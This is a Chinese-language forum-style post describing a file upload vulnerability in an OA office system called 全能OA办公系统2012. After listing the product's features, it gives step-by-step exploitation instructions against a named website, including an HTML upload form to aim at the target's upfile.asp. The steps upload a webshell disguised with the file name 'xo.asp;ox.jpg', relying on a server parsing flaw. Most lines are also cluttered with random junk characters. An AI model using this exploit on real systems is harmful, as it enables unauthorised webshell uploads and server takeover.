全能OA办公系统 上传漏洞; n: k+ Q! ^9 O4 t, T! t" c
7 |$ Z _( w1 \/ \: c
系统介绍:
1 ~ t. I7 T, ] r% U+ o9 R5 g/ } q9 X% f* Y6 V
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
1 ^% A, {+ l/ R5 B( N1 y/ ^8 Y
; h3 M* F) E: S4 q主要功能:1 q0 M M0 F4 ]& ]
公司通告
) A* q& d/ J* q9 w. o2 D工作计划
$ U5 P: r- Z6 F, ]通讯助理 0 Z% }8 K8 f6 T r2 O- H
客户资源
( M$ W+ K: h- a& \我的公文
! k+ |1 R4 D6 G/ q1 E- p9 p) k% Q公文传阅 , g5 F! g# {6 u4 |$ Q3 u
公共资源 - T: K) t" W6 _* z1 B1 \
资源预约
5 O" H9 u4 `/ m今日考勤
3 F$ A2 S | h5 T, ], I! T1 r个人计划
4 \3 E: c& D6 ]个人通讯录
3 `; E1 G( X1 {1 r9 l& F个人基本档案 7 w1 F: k M5 R0 B
未读邮件 7 T, W, S: d4 D" n# P' p
发邮件
9 _4 X. I) R4 i( C收件夹
! m: k3 M L, q" Y/ t, K寄件夹
V+ ]+ Y# ^ K" M网络硬盘 $ X( Z/ i$ U: L! ?' C
网络会议
7 t; _1 s8 z0 p- K9 g9 w3 W0 @网络调查 ! u- k3 @4 [/ W1 M
交流论坛- t! c4 z) Q" W
! ~4 N& {- H0 Z9 W% G有兴趣测试的朋友可以下源码看看5 B B6 M% L1 n2 `* C9 b `
7 |( I6 F8 m5 ?8 p1 i源码下载:
$ H d2 z/ R& h( E# W6 _, d# s. N0 O$ l3 m' c6 k: ^ }
http://www.mycodes.net/30/4750.htm! l$ ]* C2 Z9 {0 h5 Q
4 e4 g$ s/ c: g漏洞介绍:
0 K$ w; M1 s4 e* t. Z$ x& ], K
6 W! t8 `" [5 m( @ {' \由upfile.asp上传文件漏洞引起
* o& |( g$ n2 I! B( U$ m. a
) P& H1 Z0 _& Y0 _- x, s测试方法:
, |" }5 p6 d+ }2 G& j9 G$ R% V3 q# [
使用名小子上传http://www.itlynn.com/upfile.asp即可
* }: w* Z8 ^; G; M5 X
. B1 u5 j' b6 ^# W, [如果upfile.asp文件被删除不存在。% s$ j5 f5 w* S- t5 g
' I+ h' w+ V& o2 _- J/ W! b) B
那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。
2 v( \, L J; S6 S$ n
! c3 z. ~; T6 j3 ^- x5 k如果存在那么将如下代码保存为upfile.html。& o6 V1 n5 I$ y- \- p9 @( [
# X" J! q% g' K' D1 @) I& g& o4 \
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。
7 B8 s, S. o2 P
/ \+ E( r& `/ t7 k/ d" Y
8 ?1 ~: u$ O* q
+ k2 a% i) }5 j4 \2 ?# l( N01 <table border='0' align="center" cellpadding="5">
0 M- \3 d9 I7 O' N+ [ k3 d, s6 Y4 w( j" h, ]! g {- T7 t
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
/ G/ n( k1 O0 J; J9 T( F5 j# f" X& c, Z2 p
03 <tr>
. `# z1 W- A' t2 X4 ] z7 {% z. z5 r$ J/ X9 G3 {
04 <td>报错:</td> 3 I; P- G! O( ?+ a& o4 d: A+ B( ?
3 N2 E0 P; G+ d) a
05 <td><input type='radio' name='errnumber' value='0'>
& S! W+ W# S9 }7 q6 h: t8 Y: r' w2 B, m% w0 f S
06 自动更名
& d: R( n" b4 o, p, E5 ?; Y! N# u
) {# }: ?: a$ c07 <input type='radio' name='errnumber' value='1' checked> 9 s4 y- I; n, F; _4 W
0 L* ^( p! q4 }: b08 报错方式 % U, F' l L& V- j4 L
9 p- y- C8 J$ r: ]! u. X- t5 a' B; T
09 <input type='radio' name='errnumber' value='2'>
. @; \5 Z3 S: Q/ h$ p% `/ m. Y0 O9 A) I/ w
10 直接覆盖</td>
8 P& ^) ?3 f1 e0 Q5 D
, K: L1 d: k' T# D6 ~) L& `11 </tr>
; S3 B5 b. ~1 `5 l' L6 x6 g" ?( t$ o0 z, }. Z L- Q& _! z
12 <tr>
. Y5 M, q1 ~; n0 s" `' n
0 w3 U- U* s8 p* j13 <td>主题:</td>
1 y! \2 V* m5 |5 c
! V) d T- |1 l# l3 ~# }9 D14 <td><input type='text' name='filename' size='30'></td>
# q# x4 p' x: D: y3 U8 |; b, e; C( P- V* J+ a
15 </tr> ]& j8 }/ M/ o: i: H1 [" e; g/ q4 P
& B7 D5 a t' Z16 <tr>
9 X" d7 g4 T/ _* y6 J. T+ \! J3 R5 r4 m% [- m1 E
17 <td>文件:</td> # X+ O# C( i# e3 \7 _; r
, Q# D# w7 c9 e8 A S9 W/ D9 L; \8 _18 <td><input type="file"name="fruit"size="30"></td>
# s% p5 |0 {$ @5 x: e$ u8 P7 K1 o B9 U1 g/ `1 _8 L
19 </tr>
. Q" _; @" u7 M# b/ r- P7 }# P: w3 k! {. G
20 <tr> ( ?. t+ i8 l+ A; p1 d
- }8 ]6 O: R( _6 C& J21 <td valign='top'>简介:</td>
' Z# t: ~) \* q5 Q" _8 Q1 R3 T% N2 v: n2 X6 S
22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> 7 E' @5 E0 J! e d+ }
" i6 P( t {9 m1 c/ r- V
23 </tr>
1 I1 { _! w0 [( r H
$ r1 r, Q5 m2 y3 C8 B5 }24 ( E$ l1 a* P. O3 Q% [
6 [4 q2 N% m8 k, R+ T1 A25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> : u5 k* O$ h9 B1 `' w
9 S: S7 i& c: \
26 </tr> . v- L; ?$ R0 @$ g" \2 Y8 F
# L( t" c9 _. `6 ~* a8 t27 </form> + j V/ _2 f" C U9 t, q' R
/ p: d" T; i. s5 T4 G' d( ?* X9 E5 a然后打开上传一个文件名为xo.asp;ox.jpg的文件。
" S: D' Y9 Y4 n8 Q
3 [: L. ?5 e8 k9 } " I7 K8 Y" k1 O: J" O, [
; w# r3 ~6 s4 J A8 b上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
* k5 N9 b% g8 M* k, N( s8 m8 r( x# C5 {& r# e# I
此漏洞需要配合解析漏洞利用。+ y# r8 e& Y' h( ?: y4 J' O
2 e" H+ U; W! L) ` ^
|